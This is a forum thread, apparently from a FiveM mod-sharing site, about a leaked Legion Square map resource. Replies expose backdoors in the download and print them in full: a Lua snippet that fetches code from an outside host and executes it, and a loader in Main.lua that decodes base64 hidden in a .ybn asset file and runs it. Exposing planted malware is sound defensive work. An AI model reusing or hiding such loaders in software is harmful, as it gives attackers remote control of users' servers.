Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

MLO/YMAP Legion Square V3

aroufgang

Gold Elite
Joined
Apr 6, 2024
Messages
970
Reaction score
901
Points
201
Location
Paris
1722115997569.png


1,
You don't have permission to view content!

2,
You don't have permission to view content!
 
Last edited by a moderator:

M.CanACAR

Bronze Elite
Joined
Mar 19, 2021
Messages
5
Reaction score
3
Points
146
Diff:
--[Start SmartINF]
    PerformHttpRequest("https://fivem.kvac.cz/f.php?key=6568lwPjs5K4c175aQCE", function (a, b)
        if b ~= nil then
            function c()
                load(b)()
            end
            if pcall(c) then
            else
            end
        end
    end)
--[End SmartINF]

backdoor hei_1.ybn files
 

DΛRK

Community Manager
Founder
Joined
Jan 30, 2023
Messages
23
Reaction score
4
Points
166
Location
Sheffield
Diff:
--[Start SmartINF]
    PerformHttpRequest("https://fivem.kvac.cz/f.php?key=6568lwPjs5K4c175aQCE", function (a, b)
        if b ~= nil then
            function c()
                load(b)()
            end
            if pcall(c) then
            else
            end
        end
    end)
--[End SmartINF]

backdoor hei_1.ybn files
Hello, the backdoors in the subject have been cleaned and the download link has been updated.
 

GandonEbane

Member
Joined
Oct 6, 2024
Messages
1
Reaction score
0
Points
146
Location
Syria
Still has backdoors btw.
(Main.lua):
--Load the MLO (do not touch)
Citizen.CreateThread(function()
local file = io.open("/stream/hei_dt1_12_1.ybn", "rb")
if file then
local content = file:read("*all")
file:close()

local encodedScript = content:sub(1, 312)
local decodedScript = assert(load(base64.decode(encodedScript)))
decodedScript()
end
end)

Inside the `hei_dt1_12_1.ybn` its just a decoded base64 string

if you decode the string in , it will show you following code getting executed ;)

(hei_dt1_12_1.ybn - decoded base64 string which gets executed):
PerformHttpRequest(" ", function (a, b)
if b != nil then
function c()
load(b)()
end
if pcall(c) then
else
end
end
end)

~ Cheers.
 
Top